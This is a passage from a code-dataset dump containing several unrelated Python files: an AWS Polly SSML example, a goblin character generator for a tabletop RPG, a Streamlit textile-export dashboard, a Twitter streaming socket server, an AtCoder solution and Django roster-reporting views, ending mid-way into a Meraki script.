'\n f'I say, {phoneme(\"pecan\", alphabet=Alphabet.ipa, ph=\"ˈpi.kæn\")}.')\n\nwith_prosody = (f'Each morning when I wake up, {prosody(\"I speak quite slowly\", volume=\"loud\", rate=\"x-slow\")}'\n ' and deliberately until I have my coffee')\n\nsentences = sentence(\n 'Mary had a little lamb',\n 'Whose fleece was white as snow,',\n 'And everywhere that Mary went, the lamb was sure to go.'\n)\n\nsuper_fast = prosody(\n f'''\nUh, sama lamaa duma lamaa you assuming I'm a human\\\nWhat I gotta do to get it through to you I'm superhuman\\\nInnovative and I'm made of rubber\\\nSo that anything you say is ricocheting off of me and it'll glue to you\\\nI'm devastating more than ever demonstrating\\\nHow to give a motherfuckin' audience a feeling like it's levitating\\\nNever fading and I know that the haters are forever waiting\\\nFor the day that they can say I fell off they'd be celebrating\\\n'Cause I know the way to get 'em motivated, ''',\n rate=Rate.x_fast, volume=Volume.x_loud, pitch=Pitch.high\n)\n\n\nasync def main():\n # Creating a new Polly instance with default output format 'mp3'\n polly = Polly(output_format=AudioFormat.mp3)\n\n text = ssml_text(\n with_pause,\n with_emphasis,\n with_foreign_text,\n with_phonemes,\n with_prosody,\n paragraphs,\n sentences,\n super_fast,\n sep=pause(Strength.x_strong)\n )\n\n # Synthesizing speech with lexicon we just created\n # (we don't need to specify required param \"output_format\", as we using mp3 by default)\n speech = await polly.synthesize_speech(text, voice_id=VoiceID.Matthew, text_type=TextType.ssml)\n\n # Saving speech on disk with default name\n await speech.save_on_disc(directory='speech')\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","repo_name":"Bobronium/aiopolly","sub_path":"examples/using_ssml.py","file_name":"using_ssml.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"421516112","text":"from bisect import bisect\r\nfrom random import seed\r\nfrom dice import roll\r\n\r\nfrom ancestry.character import Character\r\n\r\n\r\ngoblin_background = {\r\n 1: (\"You spent the last {} year(s) in a drunken stupor. you are not proud.\", \"roll('1d6t')\"),\r\n 2: (\"The Goblin King turned you into a toad. You escaped that fate after you convinced an Elf maiden to kiss \"\r\n \"you. When she did and screamed, you killed her. You start the game with 1 Corruption.\", \"None\"),\r\n 3: (\"You accidently got your entire tribe killed.\", \"None\"),\r\n 4: (\"You were orphaned and raised by giant rats.\", \"None\"),\r\n 5: (\"You accidentally released a demon into the world.\", \"None\"),\r\n 6: (\"You spent two days believing you were a fearsome dog. You start the game with 1 Insanity.\", \"None\"),\r\n 7: (\"A hag made you her love slave for {} years.\", \"roll('1d6t')\"),\r\n 8: (\"Dwarfs almost wiped out your tribe. You are one of {} survivors.\", \"roll('1d6t')\"),\r\n 9: (\"You nearly drowned when the sewers flooded.\", \"None\"),\r\n 10: (\"You earned a living working in your profession.\", \"None\"),\r\n 11: (\"Choose a character. He or she saved your life and you now owe that character a debt.\", \"None\"),\r\n 12: (\"You are an unrepentant criminal. Add a random criminal profession to your list of professions.\", \"None\"),\r\n 13: (\"You traveled extensively. 
You speak one additional language.\", \"None\"),\r\n 14: (\"You stole a knife from a dashing knight.\", \"None\"),\r\n 15: (\"You snuck into Alfheim and stole a lock of hair from the Faerie Queen.\", \"None\"),\r\n 16: (\"You killed and ate 100 diseased rats.\", \"None\"),\r\n 17: (\"You were a henchman to a powerful wizard.\", \"None\"),\r\n 18: (\"You found a signet ring in a sewer.\", \"None\"),\r\n 19: (\"You are the seventeenth son or daughter of the Goblin King.\", \"None\"),\r\n 20: (\"You came into money and start the game with {} cp.\", \"roll('2d6t')\"),\r\n}\r\n\r\n\r\ndef roll_goblin_background(dice_roll):\r\n background, rand = goblin_background[dice_roll]\r\n return background.format(eval(rand))\r\n\r\n\r\ngoblin_personality_breakpoints = [4, 5, 7, 9, 13, 15, 17, 18]\r\ngoblin_personalities = [\r\n \"You are a bully and enjoy tormenting things that are weaker than you.\",\r\n \"You like violence, especially when it’s random and senseless.\",\r\n \"You try to rise above the filth and squalor of your people to do good in the world.\",\r\n \"You love playing tricks on other people and find their pain hilarious!\",\r\n \"You look out for yourself. To hell with everyone else!\",\r\n \"You’re just trying to stay alive!\",\r\n \"Your people didn’t deserve exile, but exile you got. You believe you will make places for yourselves and prove \"\r\n \"to those stinking elves they were wrong.\",\r\n \"You live to serve the strong and mighty.\",\r\n \"You hope to redeem your people in the eyes of the Faerie Queen.\"\r\n]\r\n\r\n\r\ndef roll_goblin_personality(dice_roll):\r\n return goblin_personalities[bisect(goblin_personality_breakpoints, dice_roll)]\r\n\r\n\r\ngoblin_odd_habit = {\r\n 1: \"You save all your secretions in small bottles and give them as gifts to people you like.\",\r\n 2: \"You never bathe.\",\r\n 3: \"You punctuate your sentences by spitting.\",\r\n 4: \"You have tremendous flatulence, yet you seem never to notice when you break wind.\",\r\n 5: \"You eat only candy.\",\r\n 6: \"You collect the genitals from creatures you kill and wear them as jewelry.\",\r\n 7: \"You lick things to claim them as your own.\",\r\n 8: \"You dress in fancy clothes.\",\r\n 9: \"You refuse to wear shoes.\",\r\n 10: \"You keep cockroaches as pets.\",\r\n 11: \"You always inspect your bowel movements, spreading the mess around with your fingers.\",\r\n 12: \"You keep a bit of iron on your person at all times.\",\r\n 13: \"You speak in a singsong voice.\",\r\n 14: \"You eat a bit of flesh from any living thing you kill.\",\r\n 15: \"You cry a lot.\",\r\n 16: \"You tell filthy jokes at inappropriate times.\",\r\n 17: \"You wear a child’s costume and refuse to take it off.\",\r\n 18: \"You keep a large collection of spoons.\",\r\n 19: \"You like to hide.\",\r\n 20: \"Make something up!\",\r\n}\r\n\r\n\r\ndef roll_goblin_odd_habit(dice_roll):\r\n return goblin_odd_habit[dice_roll]\r\n\r\n\r\ngoblin_appearance = {\r\n 1: (\"You have a long, pointed nose.\", \"None\"),\r\n 2: (\"You have bright green or orange skin.\", \"None\"),\r\n 3: (\"You have the head of a dog.\", \"None\"),\r\n 4: (\"You have a reptilian appearance with small horns sprouting from the top of your head.\", \"None\"),\r\n 5: (\"You have a wide, leering grin.\", \"None\"),\r\n 6: (\"You have a pig’s snout in place of a nose.\", \"None\"),\r\n 7: (\"You have long, slender fingers.\", \"None\"),\r\n 8: (\"You have a tooth growing out from your forehead.\", \"None\"),\r\n 9: (\"You have a tail.\", \"None\"),\r\n 10: (\"Fur grows 
thickly on your arms and legs.\", \"None\"),\r\n 11: (\"You are completely hairless.\", \"None\"),\r\n 12: (\"You have all the warts.\", \"None\"),\r\n 13: (\"A large cyst grows on your back.\", \"None\"),\r\n 14: (\"You have an abnormally long and pointed chin.\", \"None\"),\r\n 15: (\"A single horn grows out from the side of your head.\", \"None\"),\r\n 16: (\"You have one eye.\", \"None\"),\r\n 17: (\"You have {} extra fingers, placed on your body wherever you wish.\", \"roll('1d6t')\"),\r\n 18: (\"You have enormous ears.\", \"None\"),\r\n 19: (\"You have stubby little legs.\", \"None\"),\r\n 20: (\"Make something up!\", \"None\"),\r\n}\r\n\r\n\r\ndef roll_goblin_appearance(dice_roll):\r\n appearance, rand = goblin_appearance[dice_roll]\r\n return appearance.format(eval(rand))\r\n\r\n\r\ngoblin_ages_breakpoints = [4, 8, 13, 16, 18]\r\ngoblin_ages = [\r\n ('You are a child, 6 years old or younger.', 'None'),\r\n ('You are an adolescent, {} years old.', 'roll(\"1d4+6\")'),\r\n ('You are a young adult, {} years old.', 'roll(\"1d15+10\")'),\r\n ('You are a middle-aged adult, {} years old.', 'roll(\"1d25+25\")'),\r\n ('You are an older adult, {} years old.', 'roll(\"1d25+50\")'),\r\n ('You are a venerable adult, 76 years old or older.', 'None')\r\n]\r\n\r\n\r\ndef roll_goblin_age(dice_roll):\r\n age, rand = goblin_ages[bisect(goblin_ages_breakpoints, dice_roll)]\r\n return age.format(eval(rand))\r\n\r\n\r\ngoblin_build_breakpoints = [4, 5, 7, 9, 13, 15, 17, 18]\r\ngoblin_build = [\r\n 'You are short and spindly.',\r\n 'You are short and round.',\r\n 'You are short.',\r\n 'You are wiry.',\r\n 'You fall within the normal height and weight ranges for goblins.',\r\n 'You are pudgy.',\r\n 'You are tall.',\r\n 'You are tall and lanky.',\r\n 'You are very tall and heavy.',\r\n]\r\n\r\n\r\ndef roll_goblin_build(dice_roll):\r\n return goblin_build[bisect(goblin_build_breakpoints, dice_roll)]\r\n\r\n\r\ndef roll_goblin():\r\n print(roll_goblin_background(roll('1d20t')))\r\n print(roll_goblin_personality(roll('3d6t')))\r\n print(roll_goblin_odd_habit(roll('1d20t')))\r\n print(roll_goblin_appearance(roll('1d20t')))\r\n print(roll_goblin_build(roll('3d6t')))\r\n print(roll_goblin_age(roll('3d6t')))\r\n\r\n\r\nclass Goblin(Character):\r\n def __init__(self, s=None):\r\n if s:\r\n seed(s)\r\n self.ancestry = 'Goblin'\r\n self.age = roll_goblin_age(roll('3d6t'))\r\n self.build = roll_goblin_build(roll('3d6t'))\r\n self.appearance = roll_goblin_appearance(roll('3d6t'))\r\n self.odd_habit = roll_goblin_odd_habit(roll('1d10t'))\r\n self.background = roll_goblin_background(roll('1d20t'))\r\n self.personality = roll_goblin_personality(roll('3d6t'))\r\n super().__init__()\r\n\r\n def __str__(self):\r\n return (f\"Age: {self.age}\\nBuild: {self.build}\\nAppearance: {self.appearance}\\nOdd Habit: {self.odd_habit}\\n\"\r\n f\"Background: {self.background}\\nPersonality: {self.personality}\\nFirst profession: \"\r\n f\"{self.professions[0]}\\nSecond Profession: {self.professions[1]}\\nInteresting Thing: \"\r\n f\"{self.intersting_thing}\\nWealth: {self.wealth}\")\r\n\r\n def __repr__(self):\r\n return f'Class: {self.ancestry}'\r\n\r\n\r\nif __name__ == '__main__':\r\n warwick = Goblin('Warwick')\r\n print(warwick)\r\n","repo_name":"jmtaysom/sotdl","sub_path":"src/ancestry/goblin.py","file_name":"goblin.py","file_ext":"py","file_size_in_byte":8042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"69866292315","text":"import numpy as np\nimport pandas as 
pd\nimport plotly.express as px\nimport streamlit as st\nimport calendar\nimport altair as alt\n\ndef app():\n    header = '''\n    <h2> Market Insights (For Suppliers) </h2>\n    <p>\n    This dashboard provides suppliers with a visual representation of the global demand for textile materials and products\n    geographically and temporally. This will help suppliers know a country's demand and \n    determine the best products and materials to export their products to, \n    as well as the best time of the year to export textiles.\n    </p>\n    '''\n    st.markdown(header, unsafe_allow_html = True)\n\n    # Load the data\n    supplier_df = pd.read_csv(\"data/supplier_dataset.csv\")\n\n    ## Treemap 1 - Country demand\n\n    supplier_agg = supplier_df.groupby('countries_exported')['qty_exported'].sum().sort_values(ascending=False)\n    df = pd.DataFrame(supplier_agg).reset_index()\n\n    # st.write(df)\n    continent = ['Asia', 'Asia', 'Asia', 'Asia', 'North America', 'Asia', 'Asia', 'Europe', 'Asia', 'Asia', 'Asia', 'Asia', 'Europe', 'Europe', 'Europe', 'Europe', 'Europe', 'Europe', 'Asia', 'Europe']\n\n    df['continent'] = continent\n\n    st.subheader(\"Country and Continent\")\n    # desc1 = \"\"\"\n    # <p>This treemap shows the quantity of textile products exported \n    # by different countries around the world, grouped by continent.</p>\"\"\"\n    st.caption(\"This treemap shows the quantity of textile products exported by different countries around the world, grouped by continent\")\n\n    fig = px.treemap(df, \n                     path=[px.Constant(\"World\"), 'continent', 'countries_exported'], \n                     values='qty_exported',\n                     color='continent',\n                     color_continuous_scale='RdBu')\n    # color_discrete_sequence=['purple', 'green', 'dark blue', 'salmon'])\n    fig.data[0].hovertemplate = '%{label}<br>Quantity Exported:%{value}'\n    st.plotly_chart(fig)\n\n\n\n\n    ## Treemap 2 - Month of exports\n\n    st.subheader(\"Year and Month\")\n\n    # desc2 = \"\"\"\n    # <p>This treemap shows the quantity of products exported \n    # by different countries around the world, grouped by year and month of export.</p>\"\"\"\n    st.caption(\"This treemap shows the quantity of products exported by different countries around the world, grouped by year and month of export.\")\n\n    df2 = supplier_df.groupby(['month_of_export', 'year_of_export'])['qty_exported'].sum()\n    df2 = pd.DataFrame(df2).reset_index()\n    \n    # Define a dictionary to map month numbers to their names\n    month_names = {\n        1: 'Jan',\n        2: 'Feb',\n        3: 'Mar',\n        4: 'Apr',\n        5: 'May',\n        6: 'Jun',\n        7: 'Jul',\n        8: 'Aug',\n        9: 'Sep',\n        10: 'Oct',\n        11: 'Nov',\n        12: 'Dec'\n    }\n\n    # Replace month numbers with their names\n    df2['month_of_export'] = df2['month_of_export'].replace(month_names)\n\n    # Sort the DataFrame by the \"month_of_export\" column\n    df2 = df2.sort_values(by=['year_of_export', 'month_of_export'], ascending=[True, True])\n\n    # st.write(df2)\n\n    fig2 = px.treemap(df2, \n                      path=[px.Constant(\"Year\"), 'year_of_export', 'month_of_export'], \n                      values='qty_exported',\n                      color='year_of_export',\n                      color_continuous_scale='RdBu')\n    fig2.data[0].hovertemplate = '%{label}<br>Quantity Exported:%{value}'\n    st.plotly_chart(fig2)\n\n\n    ## Treemap 3 - Type of Products and materials\n    st.subheader(\"Type of Product and Material\")\n\n    # desc3 = \"\"\"\n    # <p>This treemap shows the quantity of textile products exported by \n    # different countries around the world, grouped by type of product and textile material.</p>\"\"\"\n    st.caption(\"This treemap shows the quantity of textile products exported by different countries around the world, grouped by type of product and textile material.\")\n\n\n    df3 = supplier_df.groupby(['textile_type', 'type_of_product'])['qty_exported'].sum().sort_values(ascending=False)\n    df3 = df3.reset_index()\n    fig3 = px.treemap(df3, \n                      path=['textile_type', 'type_of_product'], \n                      values='qty_exported',\n                      color='textile_type',\n                      color_continuous_scale='RdBu')\n    fig3.data[0].hovertemplate = '%{label}<br>Quantity Exported:%{value}'\n    st.plotly_chart(fig3)\n\n\n    ### 4 - Bar Chart for Month of Exports\n    st.subheader(\"Trend for Month of Exports\")\n\n    # desc4 = \"\"\"\n    # <p>This is a bar chart that shows the overall distribution in the quantity of \n    # textile products exported each month.</p>\"\"\"\n    st.caption(\"This is a bar chart that shows the overall distribution in the quantity of textile products exported each month. \")\n\n    df4 = supplier_df.groupby(['year_of_export', 'month_of_export'])['qty_exported'].sum()\n    df4 = df4.reset_index()\n    months = [calendar.month_name[i][:3] for i in range(1, 13)]\n    # st.write(months)\n    df4['month_of_export'] = pd.Categorical(df4['month_of_export'], categories=months, ordered=True)\n\n    # sort the dataframe by month_of_export column\n    df4 = df4.sort_values('month_of_export')\n    # st.write(df4)\n\n    # st.write(df)\n\n    # Create the bar chart\n    fig4 = px.bar(df4, \n                  x='month_of_export', \n                  y='qty_exported',\n                  color='qty_exported',\n                  color_discrete_sequence='RdBu')\n\n    st.plotly_chart(fig4)\n\n    ### 5 - Time Series Line Graph of Sales (per product)\n    st.subheader(\"Demand for Textile Product Over the Years\")\n\n    # desc5 = \"\"\"\n    # <p>This is a time series line chart for the quantity \n    # of your selected textile product exported each year, to better estimate the product's life cycle.\n    # </p>\"\"\"\n    st.caption(\"This is a time series line chart for the quantity of your selected textile product exported each year, to better estimate the product's life cycle.\")\n\n    df5 = supplier_df.groupby(['year_of_export', 'type_of_product'])['qty_exported'].sum()\n    df5 = df5.reset_index()\n\n    # filter dataframe by type_of_product\n    product = st.selectbox('Select Product', df5['type_of_product'].unique())\n    df_product = df5[df5['type_of_product'] == product]\n\n\n    # create time series chart using Altair\n    fig5 = px.line(df_product, x=\"year_of_export\", y=\"qty_exported\")\n\n    # show chart in Streamlit\n    st.plotly_chart(fig5)\n\n\n\n\nif __name__ == '__main__':\n    app()\n","repo_name":"weilunteo/STYLELAR-Dashboard","sub_path":"apps/supplier_dashboard_app.py","file_name":"supplier_dashboard_app.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"34652062094","text":"import os\nimport tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport socket\nimport json\nimport re\n \n#read keys from a seperate file, for github privacy\nwith open(\"config.json\",\"r\") as key:\n    keys = json.load(key)\n    access_token = keys['access_token']\n    access_secret = keys['access_secret']\n    consumer_key = keys['consumer_key']\n    consumer_secret = keys['consumer_secret']\n\n#Boiler plate code. Socket Logic \nclass TweetsListener(StreamListener):\n\n    def __init__(self, csocket):\n        self.client_socket = csocket\n\n    #to me, it makes sense to clean data before it's passed to spark.\n    #reduce workload in the long run by doing it once\n    def clean_tweet(self,tweet):\n        tweet = re.sub(r'^RT ','',tweet) # remove the RT from retweets\n        tweet = re.sub(r'@[^\\s]+','',tweet) # remove @mentions\n        tweet = re.sub(r\"\\S*https?:\\S*\",'',tweet) #remove URL\n        tweet = re.sub(r'\\\\+u\\S*','',tweet) #unicode\n        tweet = re.sub(r'[^A-Za-z0-9 ]','',tweet) #remove special\n        tweet = re.sub(r'[ \\n\\r]{2,}',' ',tweet) #remove exccess spaces\n        tweet = tweet.strip().lower() #cleanup space remove, force lower\n        return tweet\n\n    def on_data(self, data):\n        print(\"ONDATA\")\n        try:\n            #Dump the json\n            tweet = json.loads(data)\n            #print(tweet)\n\n            #Retweets are annoyingly differently formatted\n            if 'RetweetedStatus' in tweet:\n                print(\"Retweet:\")\n                tweet = tweet['retweeted_status']['extended_tweet']['full_text']\n            else:\n                print(\"Original Tweet:\")\n                if 'extended_tweet' in tweet:\n                    tweet = tweet['extended_tweet']['full_text']\n                else:\n                    tweet = tweet['text']\n            print(\"Raw Tweet:\",tweet)\n            tweet = self.clean_tweet(str(tweet))\n            print(\"Cleaned Tweet: {}\".format(tweet))\n\n            tweet+=\"\\r\\n\"\n\n            self.client_socket.sendall(tweet.encode('utf-8'))\n            return True\n        except Exception as e:\n            print(\"Error on_data: %s\" % str(e))\n            return True\n    \n    def on_error(self, status):\n        print(status)\n        return True\n    \ndef sendData(c_socket):\n    auth = OAuthHandler(consumer_key, consumer_secret)\n    auth.set_access_token(access_token, access_secret)\n    \n    twitter_stream = Stream(auth, TweetsListener(c_socket))\n    twitter_stream.filter(track=['trump'])\n    \nif __name__ == \"__main__\":\n    s = socket.socket() \n    host = \"localhost\" \n    port = 5555 \n    s.bind((host, port))\n    \n    print(\"Listening on Port {}.\".format(port))\n    \n    s.listen(1) \n    c, addr = s.accept() \n    \n    sendData( c 
)\n","repo_name":"JaimeNufio/TwitterStreamingSentimentAnalysis","sub_path":"GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"30117055653","text":"import io\r\nimport sys\r\n_INPUT=\"\"\"\\\r\n2 2\r\n\"\"\"\r\nsys.stdin=io.StringIO(_INPUT)\r\na,b=map(int,input().split())\r\n#x,y,z<=a\r\n#x+y+z=b\r\n#0<=b<=3a\r\nans=0\r\nfor x in range(a+1):\r\n #y+z=b-x\r\n minn=min(a,b-x)\r\n for y in range(minn+1):\r\n z=b-x-y\r\n if 0<=z and z<=a:\r\n ans+=1\r\nprint(ans)\r\n","repo_name":"yone-m/Atcoder","sub_path":"ABC_others/ABC051_B.py","file_name":"ABC051_B.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6502836849","text":"from django.contrib.auth.decorators import permission_required\nfrom django.http import HttpResponse, HttpResponseNotFound, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom collections import OrderedDict\n\nfrom registration.models import Person, RegistrationSession, Registration, MembershipCard\nfrom registration import lib\n\nfrom lists.models import List, QueryList\nfrom lists.lib import parseQueryList, ListParseException\n\nimport xlsxwriter\nfrom io import BytesIO\n\n#All available report headers, used for report display\nHEADERS = {\n\t'first_name': 'First Name',\n\t'last_name': 'Last Name',\n\t'name': 'Name',\n\t'gender': 'Gender',\n\t'phone_number': 'Phone Number',\n\t'peoplesoft_number': 'Peoplesoft Number',\n\t'netid': 'NetID',\n\t'hometown': 'Hometown',\n\t'major': 'Major',\n\t'person_id': 'Person ID',\n\t'emails': 'All e-mail address(es)',\n\t'preferred_emails': 'E-mail address(es) the user preferrers',\n\t'uconn_email': 'E-mail address',\n\t'membership_card': 'Membership Card',\n\t'registration_session': 'Semester',\n\t'usg_person_type': 'Registration Classification',\n\t'semester_standing': 'Semester Standing',\n\t'person_type': 'Registration Classification',\n\t'team': 'Team/Club',\n\t'paid_amount': 'Amount Paid',\n\t'paid_date': 'Paid Date',\n\t'registration_id': 'Registration ID',\n}\n\n#Attributes that can be lifted straight off the person record\nPERSONATTRS = {\n\t'first_name': 'first_name',\n\t'last_name': 'last_name',\n\t'gender': 'gender',\n\t'phone_number': 'phone_number',\n\t'peoplesoft_number': 'peoplesoft_number',\n\t'netid': 'netid',\n\t'hometown': 'hometown',\n\t'major': 'major',\n\t'person_id': 'id',\n\t'name': 'name',\n}\n\n#Attributes that can me lifted straight off the registration.person_type record\nPERSONTYPEATTRS = {\n\t'usg_person_type': 'usg_person_type',\n\t'semester_standing': 'csc_semester_standing',\n\t'person_type': 'description'\n}\n\n#Attributes that can be lifted straight off the registration record\nREGISTRATIONATTRS = {\n\t'registration_id': 'id',\n\t'paid_amount': 'paid_amount'\n}\n\n#Attributes that require the registration to be completed, aside from those listed in the direct accessors above\nREGISTRATIONREQUIREDEXTRAATTRS = ('membership_card', 'registration_session', 'team', 'paid_amount', 'paid_date')\n\n#Attributes that will require the registration to be computed\nREGISTRATIONREQUIREDFIELDS = set(REGISTRATIONATTRS.keys()) | set(REGISTRATIONREQUIREDEXTRAATTRS) | set(PERSONTYPEATTRS.keys())\n\n\ndef reportData(people, fields, sessionPriority):\n\tregistrationRequired = False\n\t\n\tfor f in fields:\n\t\tif f in 
REGISTRATIONREQUIREDFIELDS:\n\t\t\tregistrationRequired = True\n\t\n\trows = []\n\n\tdef getRegistration(p):\n\t\tfor rs in sessionPriority:\n\t\t\ttry:\n\t\t\t\treturn Registration.objects.get(person=p, registration_session=rs)\n\t\t\texcept Registration.DoesNotExist:\n\t\t\t\tcontinue\n\n\tfor p in sorted(people, key=lambda x: (x.last_name.lower(), x.first_name.lower())):\n\t\trow = []\n\n\t\tif registrationRequired:\n\t\t\tregistration = getRegistration(p)\n\t\telse:\n\t\t\tregistration = None\n\n\t\tfor f in fields:\n\t\t\tif f in PERSONTYPEATTRS:\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(getattr(registration.person_type, PERSONTYPEATTRS[f]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f in PERSONATTRS:\n\t\t\t\trow.append(getattr(p, PERSONATTRS[f]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f in REGISTRATIONATTRS:\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(getattr(registration, REGISTRATIONATTRS[f]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'membership_card':\n\t\t\t\tif registration:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmc = MembershipCard.objects.get(registration=registration)\n\t\t\t\t\t\trow.append(mc.membership_card)\n\t\t\t\t\texcept MembershipCard.DoesNotExist:\n\t\t\t\t\t\trow.append(\"None\")\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"None\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'registration_session':\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(registration.registration_session.card_code)\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'gender':\n\t\t\t\tif p.gender == 'M':\n\t\t\t\t\trow.append('Male')\n\t\t\t\telif p.gender == 'F':\n\t\t\t\t\trow.append('Female')\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'team':\n\t\t\t\tif registration and registration.team:\n\t\t\t\t\trow.append('Team')\n\t\t\t\telif registration and not registration.team:\n\t\t\t\t\trow.append('Club')\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'paid_date':\n\t\t\t\tif registration and registration.paid_date:\n\t\t\t\t\trow.append(registration.paid_date.strftime(\"%Y-%m-%d\"))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"N/A\")\n\n\t\t\t\tcontinue\t\n\n\t\t\tif f == 'emails':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.all()]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'preferred_emails':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.filter(send=True)]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'uconn_email':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.filter(email__contains=\"@uconn.edu\")]))\n\n\t\t\t\tcontinue\n\n\n\n\t\tyield row\n\ndef htmlReport(request, headers, data):\n\tdata = list(data)\n\treturn render(request, \"dashboard_report.html\", {'data': data, 'headers': headers, 'count': len(data)})\n\t\ndef excelReport(request, headers, data):\n\tout = BytesIO()\n\t\n\tworkbook = xlsxwriter.Workbook(out)\n\tworksheet = workbook.add_worksheet()\n\t\n\tbold = workbook.add_format({'bold': 1})\n\t\n\tfor i, h in enumerate(headers):\n\t\tworksheet.write(0, i, h, bold)\n\t\n\tfor i, row in enumerate(data):\n\t\tfor j, item in enumerate(row):\n\t\t\tworksheet.write(i+1, j, item)\n\t\t\t\n\tworkbook.close()\n\t\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'filename=\"roster.xlsx\"'\n\t\n\tresponse.write(out.getvalue())\n\t\n\treturn 
response\n\n@permission_required('registration.can_run_reports')\ndef index(request):\t\n\tmanagedLists = {}\n\t\n\tfor l in List.objects.exclude(list_type__in=['admin_list', 'entry_list']):\n\t\tlistType = l.get_list_type_display()\n\t\tif listType not in managedLists:\n\t\t\tmanagedLists[listType] = {}\n\t\t\n\t\tprint (l)\n\n\t\ttry:\n\t\t\tsemester, listName = l.slug.split('-', 1)\n\t\texcept ValueError as e:\n\t\t\tprint(\"Could not process %s as a semester list\" % l.slug)\n\t\t\tprint(e)\n\t\t\tcontinue\n\n\t\tif semester not in managedLists[listType]:\n\t\t\tmanagedLists[listType][semester] = []\n\t\tmanagedLists[listType][semester].append(l)\n\t\n\tsortedManagedLists = OrderedDict()\n\t\t\t\n\tfor listType in managedLists:\n\t\tsortedManagedLists[listType] = OrderedDict()\n\t\t\n\t\tsemestersDict = managedLists[listType]\n\t\t\n\t\tfor semesterCode in reversed(sorted(semestersDict, key=lib.registrationCardCodeKey)):\n\t\t\tsortedManagedLists[listType][semesterCode] = sorted(semestersDict[semesterCode], key=lambda x: x.name)\n\t\t\t\n\tunmanagedLists = List.objects.filter(list_type__in=['admin_list']).order_by('name')\n\t\t\n\treturn render(request, \"dashboard_reporting.html\", \n\t{'registration_sessions': reversed(sorted(RegistrationSession.objects.all(), key=lambda rs: lib.registrationCardCodeKey(rs.card_code))), \n\t'managed_lists': sortedManagedLists,\n\t'unmanaged_lists': unmanagedLists,\n\t'query_lists': QueryList.objects.all()})\n\t\n@permission_required('registration.can_run_reports')\ndef report(request):\n\ttry:\n\t\tpeople = parseQueryList(request.GET[\"query\"], \"\\n\")\n\texcept ListParseException as e:\n\t\treturn HttpResponse(\"Error parsing list: %s\" % e.s)\n\t\n\tfields = [field for field in request.GET[\"fields\"].splitlines() if field]\n\t\n\tregistrationSessions = [RegistrationSession.objects.get(card_code=card_code) for card_code in request.GET[\"registration_sessions\"].splitlines() if card_code]\n\t\n\ttry:\n\t\theaders = [HEADERS[f] for f in fields]\n\texcept KeyError:\n\t\treturn HttpResponse(\"There was an invalid field. 
Please check your query\")\n\t\n\t\n\tdata = reportData(people, fields, registrationSessions)\n\t\n\t\n\tif request.GET['format'] == 'HTML':\t\t\t\n\t\treturn htmlReport(request, headers, data)\n\telif request.GET['format'] == 'Excel':\n\t\treturn excelReport(request, headers, data)\n\n@permission_required('registration.can_run_reports')\ndef person_info(request):\n\tsearch = request.GET.get(\"person_info_search\", None)\n\t\n\tif not search:\n\t\treturn HttpResponseBadRequest(\"person_info_search is required\")\n\t\n\to = lib.codeSearch(search)\n\tperson = lib.autoPerson(o)\n\t\n\tif not person:\n\t\treturn HttpResponseNotFound(\"Person not found for %s\" % search)\n\t\n\ttemplateVars = {}\n\t\n\ttemplateVars[\"person\"] = person\n\t\n\tregistrations = list(person.registration_set.all())\n\tregistrations.sort(key=lambda x: lib.registrationCardCodeKey(x.registration_session.card_code))\n\tregistrations.reverse()\n\ttemplateVars[\"registrations\"] = registrations\n\t\n\tallLists = List.objects.filter(people=person).order_by('name')\n\tentryLists = allLists.filter(list_type='entry_list')\n\tadminLists = allLists.filter(list_type='admin_list')\n\t\n\tqueryLists = []\n\t\n\tfor q in QueryList.objects.all():\n\t\tif person in q.people:\n\t\t\tqueryLists.append(q)\n\tqueryLists.sort(key=lambda q: q.name)\n\t\t\t\n\ttemplateVars[\"entry_lists\"] = entryLists\n\ttemplateVars[\"admin_lists\"] = adminLists\n\ttemplateVars[\"query_lists\"] = queryLists\n\t\n\t\n\treturn render(request, 'dashboard_person_info.html', templateVars)","repo_name":"Hovercross/uconnballroom","sub_path":"dashboard/views/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11504375291","text":"import csv\r\nfrom datetime import datetime\r\nimport os\r\nfrom pprint import pprint\r\nimport tabulate\r\nimport meraki\r\nimport json\r\n\r\n# Either input your 